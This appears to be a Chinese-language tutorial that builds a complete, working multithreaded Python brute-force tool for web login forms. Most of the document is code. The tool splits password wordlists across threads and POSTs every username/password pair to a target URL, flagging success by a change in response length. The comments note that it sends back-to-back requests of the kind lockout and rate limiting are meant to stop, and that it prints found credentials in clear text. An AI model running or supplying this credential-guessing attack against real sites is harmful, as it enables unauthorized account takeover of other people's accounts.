登录脚本


import optparse
# Build the parser and set the usage line shown by -h and on option errors.
parser = optparse.OptionParser()
parser.usage = "Brute_force.py -u user_file"

# "-u" and "--user_file" are the short and long spellings of the same option.
# The string that follows it on the command line is stored on
# options.username_file (dest); metavar is only the placeholder printed in
# the help text.
parser.add_option(
    "-u",
    "--user_file",
    dest="username_file",
    metavar="FILE",
    type="string",
    action="store",
    help="read username from file",
)

# parse_args() returns the parsed options plus any leftover positional arguments.
options, args = parser.parse_args()

# Echo the value that was passed; it is None when -u was not supplied.
print(options.username_file)

结果如下

C:\Users\lnterpreter\Desktop> python Brute_force.py -u username.txt
username.txt

下面我们将写一个爆破工具

import optparse
import math				#向下取整的模块
import threading
import requests

# Command-line interface: target URL, username wordlist, password wordlist
# and the number of slices the password wordlist is split into.
parser = optparse.OptionParser()
parser.usage = "web_Brute_force.py -s url -u user_file -p pass_file -t num"

parser.add_option(
    "-s", "--site",
    dest="website",
    metavar="URL",
    type="string",
    action="store",
    help="website",
)
parser.add_option(
    "-u", "--userfile",
    dest="userfile",
    metavar="USERFILE",
    type="string",
    action="store",
    help="username from file",
)
parser.add_option(
    "-p", "--passfile",
    dest="passfile",
    metavar="PASSFILE",
    type="string",
    action="store",
    help="password from file",
)
parser.add_option(
    "-t", "--threads",
    dest="threads",
    metavar="THREADS",
    type="int",
    action="store",
    help="ThreadNum",
)

options, args = parser.parse_args()

# No option declares a default, so each of these is None when its flag is
# omitted. site is used verbatim as the POST target further down; nothing
# here checks its scheme, so with an http:// URL the submitted credentials
# are not encrypted in transit.
site, user_dict, pass_dict, ths = (
    options.website,
    options.userfile,
    options.passfile,
    options.threads,
)

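pass_list = []   # one sub-list of candidate passwords per worker
result_num = 0   # base number of passwords handed to each worker

# -t declares no default, so ths is None when the flag is omitted; zero or a
# negative value cannot be used as a divisor either. Stop with a clear
# message instead of failing inside the arithmetic below.
if ths is None or ths < 1:
    raise SystemExit("-t/--threads must be a positive integer")

# Step 1: load the password wordlist and count its lines. strip() removes the
# line terminator and any other leading/trailing whitespace; blank lines stay
# in the list as empty-string candidates.
with open(pass_dict) as f:
    temp_list = [line.strip() for line in f]
num = len(temp_list)

# Step 2: decide how many slices to build. min() keeps every slice non-empty
# when the wordlist has fewer lines than the requested thread count.
worker_count = min(ths, num)

# Step 3: floor division gives the base slice size (0 for an empty wordlist).
if worker_count:
    result_num = num // worker_count

# Step 4: cut the wordlist into exactly worker_count contiguous slices. The
# last slice also receives the remainder, so no candidate is dropped and the
# number of slices never exceeds the requested thread count.
for index in range(worker_count):
    start = index * result_num
    is_last = index == worker_count - 1
    stop = num if is_last else start + result_num
    pass_list.append(temp_list[start:stop])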

def test():
    """Return the body length of a login attempt that is expected to fail.

    Posts the placeholder pair 111/111 to ``site`` and measures the response
    text. The form field names (``username``, ``password``, ``submit``) are
    specific to the target form; the author notes this form has no CAPTCHA.

    NOTE(review): using this length as the "failure" signature assumes that
    111/111 is not a valid account and that every failed login returns a body
    of exactly this length. A page that echoes the submitted username or
    embeds a variable-length token would break that assumption.
    """
    baseline_form = {"username": 111, "password": 111, "submit": "login"}
    response = requests.post(site, data=baseline_form)
    return len(response.text)


# Baseline body length of a failed login, measured once when the script is
# loaded: test() sends one login request as soon as this line runs.
# The misspelt name is left as is because scan() reads it under this name.
error_lenght = test()


def scan(payload):
    """Try every password of one slice against a single username.

    ``payload`` is a dict with the keys ``"user"`` (the username) and
    ``"pass_list"`` (the candidate passwords for this worker). Any response
    whose body length differs from ``error_lenght`` is printed; nothing is
    returned.

    The requests are sent back to back, one POST per candidate, with no
    delay between them. On the server this shows up as a run of login
    POSTs for one username, the pattern that per-account lockout and
    per-client rate limiting are designed to act on.
    """
    username = payload["user"]
    candidates = payload["pass_list"]
    for candidate in candidates:
        form = {"username": username, "password": candidate, "submit": "login"}
        response = requests.post(url=site, data=form)
        body_length = len(response.text)
        if body_length == error_lenght:
            continue
        # A different length is only a hint, not proof of a successful login:
        # an error page of another size is reported the same way.
        # The line below writes the username and password in clear text to
        # stdout, so terminal logs and redirected output will contain them.
        report = " ".join([
            "url",
            site,
            "username:" + username,
            "password:" + candidate,
            "length: " + str(body_length),
        ])
        print(report + "\r\n")

# Dictionary run: build one thread per (username, password slice) pair.
# NOTE(review): the total is len(user_list) * len(pass_list) threads, so -t
# controls how many slices each username is split into; it does not cap the
# number of threads running at once.
ths_list = []
with open(user_dict, 'r') as f:
    user_list = f.readlines()
    ths_list.extend(
        threading.Thread(
            target=scan,
            # strip() drops the line terminator read from the username file
            args=({"user": user.strip(), "pass_list": pass_line},),
        )
        for user in user_list
        for pass_line in pass_list
    )

# Start every worker. The threads are not joined here; they are non-daemon
# threads, so the interpreter waits for them before it exits.
for worker in ths_list:
    worker.start()
